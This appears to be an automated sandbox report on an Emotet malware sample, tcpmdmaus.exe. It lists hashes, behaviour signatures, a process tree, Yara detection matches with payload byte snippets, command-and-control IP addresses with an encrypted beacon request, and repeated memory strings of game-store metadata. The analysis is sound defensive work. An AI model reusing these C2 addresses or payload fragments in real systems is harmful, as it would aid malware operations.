Play interactive tour

Edit tour

Windows Analysis Report tcpmdmaus.exe

Overview

General Information

Sample Name:	tcpmdmaus.exe
Analysis ID:	497240
MD5:	abe13ddc14525c4c35a85224689bfb27
SHA1:	01b8022edd4ef8e9ab20807c032b7ce2849b3df3
SHA256:	8524e558dded9665e69541b332d556e43c007d0d4001fe5355ac4816c22e7a21
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected Emotet

Machine Learning detection for sample

Hides that the sample has been downloaded from the Internet (zone.identifier)

Drops executables to the windows directory (C:\Windows) and starts them

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Contains functionality to launch a process as a different user

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Queries disk information (often used to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to delete services

Classification

Process Tree

System is w10x64

tcpmdmaus.exe (PID: 5368 cmdline: 'C:\Users\user\Desktop\tcpmdmaus.exe' MD5: ABE13DDC14525C4C35A85224689BFB27)

tcpmdmaus.exe (PID: 3200 cmdline: C:\Users\user\Desktop\tcpmdmaus.exe MD5: ABE13DDC14525C4C35A85224689BFB27)

svchost.exe (PID: 6160 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

sharedconnect.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\sharedconnect.exe MD5: ABE13DDC14525C4C35A85224689BFB27)

sharedconnect.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\sharedconnect.exe MD5: ABE13DDC14525C4C35A85224689BFB27)

svchost.exe (PID: 2940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp	Emotet	Emotet Payload	kevoreilly	0x5990:$snippet4: 33 C0 C7 05 80 A8 48 01 00 A0 48 01 C7 05 84 A8 48 01 00 A0 48 01 A3 88 A8 48 01 A3 8C A8 48 01 A3 90 A8 48 01 39 05 00 A0 48 01 74 1D 8D 49 00 40 A3 88 A8 48 01 83 3C C5 00 A0 48 01 00 75 F0 ...
00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp	Emotet	Emotet Payload	kevoreilly	0x5990:$snippet4: 33 C0 C7 05 80 A8 95 00 00 A0 95 00 C7 05 84 A8 95 00 00 A0 95 00 A3 88 A8 95 00 A3 8C A8 95 00 A3 90 A8 95 00 39 05 00 A0 95 00 74 1D 8D 49 00 40 A3 88 A8 95 00 83 3C C5 00 A0 95 00 00 75 F0 ...
00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp	Emotet	Emotet Payload	kevoreilly	0x5990:$snippet4: 33 C0 C7 05 80 A8 86 00 00 A0 86 00 C7 05 84 A8 86 00 00 A0 86 00 A3 88 A8 86 00 A3 8C A8 86 00 A3 90 A8 86 00 39 05 00 A0 86 00 74 1D 8D 49 00 40 A3 88 A8 86 00 83 3C C5 00 A0 86 00 00 75 F0 ...
00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp	Emotet	Emotet Payload	kevoreilly	0x5990:$snippet4: 33 C0 C7 05 80 A8 CD 00 00 A0 CD 00 C7 05 84 A8 CD 00 00 A0 CD 00 A3 88 A8 CD 00 A3 8C A8 CD 00 A3 90 A8 CD 00 39 05 00 A0 CD 00 74 1D 8D 49 00 40 A3 88 A8 CD 00 83 3C C5 00 A0 CD 00 00 75 F0 ...
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.sharedconnect.exe.860000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.sharedconnect.exe.860000.2.unpack	Emotet	Emotet Payload	kevoreilly	0x5d90:$snippet4: 33 C0 C7 05 80 A8 86 00 00 A0 86 00 C7 05 84 A8 86 00 00 A0 86 00 A3 88 A8 86 00 A3 8C A8 86 00 A3 90 A8 86 00 39 05 00 A0 86 00 74 1D 8D 49 00 40 A3 88 A8 86 00 83 3C C5 00 A0 86 00 00 75 F0 ...
7.2.sharedconnect.exe.1480000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.sharedconnect.exe.1480000.3.unpack	Emotet	Emotet Payload	kevoreilly	0x5d90:$snippet4: 33 C0 C7 05 80 A8 48 01 00 A0 48 01 C7 05 84 A8 48 01 00 A0 48 01 A3 88 A8 48 01 A3 8C A8 48 01 A3 90 A8 48 01 39 05 00 A0 48 01 74 1D 8D 49 00 40 A3 88 A8 48 01 83 3C C5 00 A0 48 01 00 75 F0 ...
5.2.tcpmdmaus.exe.cd0000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.tcpmdmaus.exe.cd0000.2.unpack	Emotet	Emotet Payload	kevoreilly	0x5d90:$snippet4: 33 C0 C7 05 80 A8 CD 00 00 A0 CD 00 C7 05 84 A8 CD 00 00 A0 CD 00 A3 88 A8 CD 00 A3 8C A8 CD 00 A3 90 A8 CD 00 39 05 00 A0 CD 00 74 1D 8D 49 00 40 A3 88 A8 CD 00 83 3C C5 00 A0 CD 00 00 75 F0 ...
0.2.tcpmdmaus.exe.950000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.tcpmdmaus.exe.950000.3.unpack	Emotet	Emotet Payload	kevoreilly	0x5d90:$snippet4: 33 C0 C7 05 80 A8 95 00 00 A0 95 00 C7 05 84 A8 95 00 00 A0 95 00 A3 88 A8 95 00 A3 8C A8 95 00 A3 90 A8 95 00 39 05 00 A0 95 00 74 1D 8D 49 00 40 A3 88 A8 95 00 83 3C C5 00 A0 95 00 00 75 F0 ...
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: tcpmdmaus.exe	Virustotal: Detection: 85%	Perma Link
Source: tcpmdmaus.exe	Metadefender: Detection: 16%	Perma Link
Source: tcpmdmaus.exe	ReversingLabs: Detection: 96%

Antivirus / Scanner detection for submitted sample

Show sources

Source: tcpmdmaus.exe

Avira: detected

Machine Learning detection for sample

Show sources

Source: tcpmdmaus.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 0_2_003B14C9 wsprintfA,GetBinaryTypeA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree,	0_2_003B14C9
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_003B14C9 wsprintfA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree,	5_2_003B14C9
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD20D9 CryptExportKey,	5_2_00CD20D9
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2435 CryptVerifySignatureW,CryptDestroyHash,	5_2_00CD2435
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD21F9 CryptGenKey,CryptDestroyKey,CryptReleaseContext,	5_2_00CD21F9
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2195 CryptImportKey,LocalFree,CryptReleaseContext,	5_2_00CD2195
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2174 CryptDecodeObjectEx,CryptReleaseContext,	5_2_00CD2174
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2129 CryptGetHashParam,	5_2_00CD2129
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD22A6 CryptDuplicateHash,	5_2_00CD22A6
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2261 CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	5_2_00CD2261
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2217 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	5_2_00CD2217
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2396 CryptDuplicateHash,CryptDecrypt,CryptDestroyHash,	5_2_00CD2396
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2307 CryptEncrypt,CryptDestroyHash,	5_2_00CD2307
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2336 CryptDestroyHash,	5_2_00CD2336
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 6_2_003B14C9 wsprintfA,GetBinaryTypeA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree,	6_2_003B14C9
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_003B14C9 wsprintfA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree,	7_2_003B14C9
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482195 CryptImportKey,LocalFree,CryptReleaseContext,	7_2_01482195
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482336 CryptDestroyHash,	7_2_01482336
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482129 CryptGetHashParam,	7_2_01482129
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482435 CryptVerifySignatureW,CryptDestroyHash,	7_2_01482435
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482261 CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	7_2_01482261
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_014822A6 CryptDuplicateHash,	7_2_014822A6

Source: tcpmdmaus.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: tcpmdmaus.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: ewjrRWJW##@HRh.pdb source: tcpmdmaus.exe

Source: Joe Sandbox View

IP Address: 24.217.117.217 24.217.117.217

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 77.157.40.119:443Content-Length: 388Connection: Keep-AliveCache-Control: no-cacheData Raw: 2e f5 8d 30 20 97 63 af c8 5c 78 1d 1b 05 84 50 56 8e 19 5b d4 5e 84 69 7f 59 6c 87 46 e0 d0 59 8a f6 f3 38 80 a7 31 36 2a 41 93 7c 48 14 e8 94 4c f9 4b a4 47 e8 3f dd ae dc 2e 2b a6 0b 4e 9c 34 a8 33 bf b2 99 f0 55 30 50 57 c9 c7 08 84 57 c2 87 fe ef f4 fc 77 58 f0 6b 96 ac 8a dc 86 e9 20 3d c9 74 db ea 0a ab 88 74 c8 a2 da fc ca 06 27 02 7e a7 63 dd 3c 82 37 62 c3 a8 6a 68 12 a6 6c 70 b1 91 2e 31 24 27 9d ec 9e b1 3c 60 67 ed 52 57 23 21 97 d1 43 4b 2b f3 c0 e1 d7 82 bd 52 05 c3 43 20 17 61 0a dc ab cd c6 64 a6 a4 fe c2 c1 49 a3 e5 b5 c1 14 51 03 79 f0 cd 9d 37 2c 80 ec 86 6d 01 ab 1d 6e 2b af 18 4a 34 7e 89 f2 2d df ca f3 76 fb 2a 58 a0 da 6e 5b b3 e4 35 ff 79 1c 08 46 4f f8 f4 d1 97 26 3f 57 f1 fe 15 cb 39 c2 3f 9a 59 61 23 4a 83 97 0b 58 bb b3 e5 2d a3 fb 9e bd 22 dc 9e 9e e9 b1 bf 77 80 43 48 4f 42 61 24 17 ab 8b 56 2a d4 4c c4 56 1c 00 70 44 c3 81 65 e6 f8 8f 76 25 88 52 c6 8c 6e 33 f3 e4 0e 60 c1 63 0e 7a 7b 6f 50 ab 44 30 93 04 9f e4 a9 3a 73 17 af 84 fb 97 c1 dd 90 81 87 1b d4 f8 ce e1 a3 09 5c f0 44 44 8f 9c 35 7c bc 2a c5 93 40 4e 97 a2 d9 5b ed bd de 1b 90 8c 2a 61 27 49 13 6f 1a d4 55 91 07 0b ff b1 62 6e ec f2 b1 b2 df 1a d2 2d c8 Data Ascii: .0 c\xPV[^iYlFY816*A|HLKG?.+N43U0PWWwXk =tt'~c<7bjhlp.1$'<`gRW#!CK+RC adIQy7,mn+J4~-v*Xn[5yFO&?W9?Ya#JX-"wCHOBa$V*LVpDev%Rn3`cz{oPD0:s\DD5|*@N[*a'IoUbn-

Source: global traffic	TCP traffic: 192.168.2.6:49840 -> 66.220.110.56:50000
Source: global traffic	TCP traffic: 192.168.2.6:49848 -> 197.82.220.82:8080
Source: global traffic	TCP traffic: 192.168.2.6:49851 -> 212.83.128.139:8080
Source: global traffic	TCP traffic: 192.168.2.6:49852 -> 139.162.216.32:8080

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown	TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown	TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown	TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown	TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown	TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown	TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown	TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown	TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown	TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown	TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown	TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown	TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown	TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.216.32
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.216.32
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.216.32

Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD"